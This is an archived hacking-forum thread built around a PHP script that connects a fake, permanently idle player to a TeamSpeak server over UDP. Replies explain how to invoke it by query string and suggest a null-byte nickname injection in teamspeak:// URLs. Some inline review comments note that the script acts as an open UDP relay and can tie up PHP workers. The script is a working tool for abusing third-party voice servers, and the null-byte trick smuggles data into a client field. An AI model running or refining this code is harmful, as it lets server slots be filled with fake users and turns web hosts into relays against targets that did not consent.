Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
 Post subject: Teamspeak Fake Player via. PHP
PostPosted: 03 Sep 2008 20:20 

Joined: 24 Aug 2008 12:54
Posts: 1
Code:
<?php
/*
TeamSpeak Fake Player PHP
By: Fabian( DarK PhoEniX )

Credits:
Luigi - Explained me that stupid uninitialised buffers
Some other for hex2str and DecToHex32
*/
  function MyCRC32( $data )
  {
     $csum = dechex(crc32( $data ));
     
     $csum_string =   chr( hexdec(substr( $csum, 6, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 4, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 2, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 0, 2 )) );
     
     return $csum_string;     
  }
  function hex2str($hex)
  {
    for($i=0;$i<strlen($hex);$i+=2)
    {
      $str.=chr(hexdec(substr($hex,$i,2)));
    }
    return $str;
  }
  function BuildTeamSpeakString($string, $len)
  {
    if( strlen( $string ) > $len || strlen( $string ) > 255 )
        die( "String is too long..." );
   
    $ts_string = hex2str( strVal( dechex(strlen($string)) ) );
    $ts_string .= $string;

    for( $i = 0; $i < ($len - strlen($string)); $i = $i + 1 )
        $ts_string .= hex2str("00");
   
    return $ts_string;
  }
  function DecToHex32($number)
  {
      $i = 0;
      $hex = array();
 
      while($i < 8) {
          if($number == 0) {
              array_push($hex, '0');
          }
          else {
              array_push($hex, strtoupper(dechex(bcmod($number, '16'))));
              $number = bcdiv($number, '16', 0);
          }
          $i++;
      }
      krsort($hex);
      $imp_string = implode($hex);
     
      $ret_string =   substr( $imp_string, 6, 2 );
      $ret_string .=  substr( $imp_string, 4, 2 );
      $ret_string .=  substr( $imp_string, 2, 2 );
      $ret_string .=  substr( $imp_string, 0, 2 );
      return $ret_string;
  }
 
  // Request entry point: everything below runs once per HTTP request to this page.
  // Both query parameters must be present and truthy or the script stops here.
  // NOTE(review): no authentication, rate limit or destination allow-list is visible,
  // so anyone who can reach this page chooses where the hosting server sends UDP
  // traffic. On a web host this is an open relay and should not be left reachable.
  if( !$_GET['ServerIP'] || !$_GET['ServerPort'] )
  {
    die( "No Target!" );
  }
 
  // ServerIP is used verbatim in the udp:// URL further down; only the port is
  // coerced to an integer.
  $TeamSpeakIP = $_GET['ServerIP'];
  $TeamSpeakPort = intVal($_GET['ServerPort']);
 
  // Four-byte placeholders, overwritten from the first response if it is accepted.
  $SessionID = hex2str("00000000");
  $PlayerID = hex2str("00000000");
  $FileName = '';
 
  // First datagram. Bytes 16..19 are a zeroed checksum slot that is filled in after
  // the CRC has been computed over the whole packet. The field meanings are not
  // documented on this page. The client strings below are fixed literals, so a
  // server operator can match on them in logs or captures to spot this script.
  $packet1 = hex2str("f4be");
  $packet1 .= hex2str("0300");
  $packet1 .= hex2str("00000000");
  $packet1 .= hex2str("00000000");
  $packet1 .= hex2str("01000000");
  $packet1 .= hex2str("00000000"); // CRC32
  $packet1 .= BuildTeamSpeakString("TeamSpeak",29);
  $packet1 .= BuildTeamSpeakString("PHP v.1337 By: Fabian",29);
  $packet1 .= hex2str("0200000020003C00");
  $packet1 .= hex2str("01");
  $packet1 .= hex2str("01");
  $packet1 .= BuildTeamSpeakString("",29);
  $packet1 .= BuildTeamSpeakString("",29);
  $packet1 .= BuildTeamSpeakString("TSPHP v1.0",29);
 
  // Patch the checksum into the placeholder at offset 16.
  $checksum = MyCRC32( $packet1 );
  for( $count = 0; $count < 4; $count = $count + 1 )
  {
      $packet1[16+$count] = $checksum[$count];
  }
       
  // NOTE(review): the fsockopen() result is not checked; on failure the calls below
  // receive false instead of a stream.
  $udpsocket = fsockopen("udp://" . $TeamSpeakIP, $TeamSpeakPort);
  fwrite($udpsocket, $packet1);
  // One-second read timeout for every fread() on this socket.
  stream_set_timeout($udpsocket, 1);
  $response = ''.fread($udpsocket, 10000);
  $info = stream_get_meta_data($udpsocket);
 
   if ($info['timed_out']) {
       die("Timed Out!");
   }else{
   
       // The reply is treated as accepted when bytes 88..91 equal 01 00 00 00.
       // NOTE(review): the length of $response is never checked before the fixed
       // offsets 8 and 172 are read below.
       if( substr($response, 88, 4) == "\x01\x00\x00\x00" )
       {
           // Copy four bytes from offset 172 of the reply into the session id.
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $SessionID[$count] = $response[172+$count];
           }
           echo( "\n" );
           
           // Copy four bytes from offset 8 of the reply into the player id.
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $PlayerID[$count] = $response[8+$count];
           }
           
           // Marker file: three random lowercase letters + "TS.txt", created in the
           // current working directory with the content "Alive". The keep-alive loop
           // below stops when this file no longer contains "Alive" or cannot be read,
           // so deleting it is the only stop switch. The name is never shown to the
           // requester and the file is never removed by the script, so stray *TS.txt
           // files containing "Alive" in a web directory indicate this script has run.
           $FileName .= chr(rand(97,122));
           $FileName .= chr(rand(97,122));
           $FileName .= chr(rand(97,122));
           $FileName .= "TS.txt";
           $handler = fOpen($FileName , "a+");
           fWrite($handler , "Alive");
           fClose($handler);
                     
           // Second datagram; session id goes to offset 4, player id to offset 8 and
           // the checksum to offset 20 (patched in below).
           $packet2 = hex2str("F0BE");
           $packet2 .= hex2str("0500");
           $packet2 .= hex2str("00000000");
           $packet2 .= hex2str("00000000");
           $packet2 .= hex2str("01000000");
           $packet2 .= hex2str("00000000");   
           $packet2 .= hex2str("00000000");// CRC32
           $packet2 .= hex2str("0100");
           $packet2 .= BuildTeamSpeakString("Long AFK",29);
           $packet2 .= BuildTeamSpeakString("",29);
           $packet2 .= BuildTeamSpeakString("",29);
           $packet2 .= hex2str("00000000");
               
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $packet2[4+$count] = $SessionID[$count];
           }
           
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $packet2[8+$count] = $PlayerID[$count];
           }     
           
           $checksum = MyCRC32( $packet2 );
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
               $packet2[20+$count] = $checksum[$count];
           }
           
           fwrite($udpsocket, $packet2);
           $response = ''.fread($udpsocket, 10000);
           $info = stream_get_meta_data($udpsocket);
         
           if ($info['timed_out']) {
              echo("Timed Out!");
           }else{
              echo("Player Connected!");
             
              $seq = 2;
              // From here the request outlives its client: the script keeps running
              // after the browser disconnects and PHP's execution time limit is off.
              // NOTE(review): each request therefore pins one PHP worker until the
              // marker file is removed; repeated requests can exhaust the worker pool.
              ignore_user_abort(true);
              set_time_limit(0);
             
              for(;;)
              {
                  // Stop condition: marker file unreadable/empty or missing "Alive".
                  $text = file_get_contents($FileName);
                  if( $text == false || !strstr( $text, "Alive" ) )
                      break;
                                       
                  // Periodic datagram carrying the running sequence number; the
                  // checksum slot is at offset 16.
                  $packet3 = hex2str("F4BE");
                  $packet3 .= hex2str("0100");
                  $packet3 .= hex2str("00000000");
                  $packet3 .= hex2str("00000000");
                  $packet3 .= hex2str(DecToHex32($seq));                                                                                                             
                  $packet3 .= hex2str("00000000");// CRC32
                 
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[4+$count] = $SessionID[$count];
                  }
                   
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[8+$count] = $PlayerID[$count];
                  }       
                 
                  $checksum = MyCRC32( $packet3 );
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[16+$count] = $checksum[$count];
                  }                 
                 
                  $seq = $seq + 1;
                                   
                  fwrite($udpsocket, $packet3);
                 
                  // Waits for any non-empty read before the next iteration.
                  // NOTE(review): if the remote side stops answering, this inner loop
                  // never exits and the marker-file check above is never reached again.
                  while( !fread($udpsocket, 10000) ){}
              }           
           }
       }else{
           die("Player Not Accepted!");
       }
   
   }
?>


Suggestions for improvements are welcome...


 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 17 Sep 2008 12:39 

Joined: 09 Apr 2008 08:06
Posts: 66
Location: USA
not bad also i cant remember tho but there also is a null you could add cant remember what versions it works for but you would put in browser for example teamspeak://IP:PORT?nickname=name%00 and well yea.


 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 17 May 2010 17:29 

Joined: 16 May 2010 16:45
Posts: 5
well, i kinda didnt get the part you have to type into the browser,is it like www.url.de/ts.php/192.168.178.48:8767 (it is just an example) or what? because it is kinda weird, it dosnt really work out for me


 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 25 May 2010 11:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
www.url.de/ts.php?ServerIP=192.168.178. ... rPort=8767


 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 09 Sep 2010 00:44 

Joined: 19 May 2009 21:37
Posts: 36
tested on a ts2 public server without psw protect , all I get is on the page after pressing enter = " Timed Out! "

